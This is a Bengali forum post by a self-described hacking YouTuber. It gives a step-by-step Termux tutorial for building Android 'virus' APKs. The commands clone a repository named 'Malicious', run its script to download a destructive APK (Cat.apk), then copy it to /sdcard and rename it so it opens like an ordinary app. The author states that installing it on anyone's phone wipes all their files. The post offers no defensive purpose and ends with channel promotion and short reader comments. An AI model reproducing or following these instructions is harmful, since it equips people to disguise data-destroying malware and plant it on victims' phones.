শুরুতে সকলকেই জানাই ♥️আসসালামুআলাইকুম♥️
আশা করি সকলেই ভালো আছেন। আলহামদুলিল্লাহ আমিও অনেক ভালো আছি।
আপনারা তো জানেনই, আমি আমার ইউটিউব চ্যানেলে শুধু হ্যাকিং ভিডিও আপলোড করে থাকি ।
তার মধ্যে থেকে কিছু হ্যাকিং টিউটোরিয়াল আমি ট্রিকবিডির মাঝে শেয়ার করি।
তো আজকে আমি আপনাদের মাঝে দারুন একটি tutorial শেয়ার করবো।
?আজকে আমি আপনাদের দেখাতে চলেছি ?
কিভাবে অ্যান্ড্রয়েড মোবাইলের জন্য apk ভাইরাস তৈরী করবেন তা আজকে আমি আপনাদের দেখাব।
আরেকটি কথা প্রথমেই বলে রাখি,এটি যদি আপনি আপনার অথবা যে কারোর অ্যান্ড্রয়েড মোবাইলে ইন্সটল দেন তবে তার সকল ফাইল নষ্ট হবে।
? তো চলুন শুরু করা যাক ?
১/আপনাকে সর্বপ্রথমে Termux এপস ইন্সটল দিতে হবে।
২/Termux এপস ইন্সটল দেওয়ার পর আপনাকে এই সকল কমান্ড দিতে হবে?
pkg update && pkg upgrade
pkg install git
pkg install gem
pkg install python2
git clone https://github.com/Hider5/Malicious
সব সময় ওপেন করার জন্য। রিকমান্ড গুলো ব্যবহার করবেন।
cd Malicious
pip2 install -r requirements.txt
python2 malicious.py
এরকম আসলে আপনি বুঝবেন,সব ঠিক ভাবে করেছেন।

এখন দেখুন এখানে সব ভাইরাস পেয় গেছেন, এখন আপনি কোন ভাইরাস টি ইন্সটল দিবেন তা আপনার ইচ্ছা
আপনি যেটি ইন্সটল দিতে চান তার বামে যে নাম্বারটি রয়েছে সেটি লিখে দিন।
আমি ২১ নাম্বারটি ইন্সটল দিব, এজন্য ২১ লিখছি।
এখন ২১ নাম্বার। বা Cat.apk ভাইরাসটি ডাউনলোড হবে।
বুঝলেন কিনা????

??এখন আপনাকে apk ফাইলটি কপি করতে হবে আবার এই কমান্ড দিতে হবে??
cd Android
ls

এখন আপনি যেটা ডাউনলোড করেছেন সেটি ঠিক বামে লেখা রয়েছে আমার স্ক্রীনশট ভালো করে দেখুন।
Now Your Command Is For Copy
cp -r [your apk file name ] [path[
Example: cp -r Cat.apk /sdcard
আপনি চাইলে মুভ করতে পারেন,মুভ করার কমান্ড,
Example:mv -v Cat.apk /sdcard
মনে রাখবেন বানান যেভাবে দেওয়া থাকবে আপনাকে ঠিক সেভাবেই দিতে হবে।
Rename it [রিনেম করতেই হবে]

আপনি cat বাদ দিয়ে অন্য যেকোনো লিখতে পারেন।
তাহলেই এপস ওপেন হবে।
ইন্সটল দিলেই সব ফাইল নষ্ট হয়ে যেতে পারে এজন্য আমি ইন্সটল দিব না।
♥️আজকের পোস্ট এখানেই শেষ♥️
♥️আমি আগের পোস্টে আপনাদের সাথে একটি গান শেয়ার করেছিলাম।
আমি ভেবেছিলাম,আমি এতদিন যাবৎ ট্রিকবিডির সাথে কত ধরনের ট্রিকস শেয়ার করলাম,তাহলে নিশ্চয় আমার মামার গানটিও আপনারা শেয়ার করবেন,?কিন্তু কেও শেয়ার করলেন না। আমি ভেবেছিলাম আপনারাই তাকে সেরা মঞ্চে উঠাবেন কিন্তু তা হলো না,?খুবই দুঃখ লাগছে ভাই,আমার কষ্টটা কেও বুঝলেন না।
আসলে এক পোষ্টে বেশি কিছু লেখা যায় না।
আমার এই পোষ্টটি বুঝতে অসুবিধা হলে আমার ভিডিওটি দেখতে পারেন। ?
?Click Here To View MY Video?
হ্যাকিং সংক্রান্ত সকল টিউটোরিয়াল আরো আগে পেতে
?SUBSCRIBE MY CHANNEL?
Contact me on Social media For Messaging
?
Follow Me On Instagram
?
??♥️?আশা করি সকলেরই আমার পোস্টটি ভালো লেগেছে ♥️ যদি আপনাদের কোনো সমস্যা হয় তবে কমেন্ট করে জানিয়ে দিন ???♥️
darun
সূর্যের ঐখানে পাঠায়েন
মোবাইল ফোন ঠিক করার,দারুন একটি পদ্ধতি আছে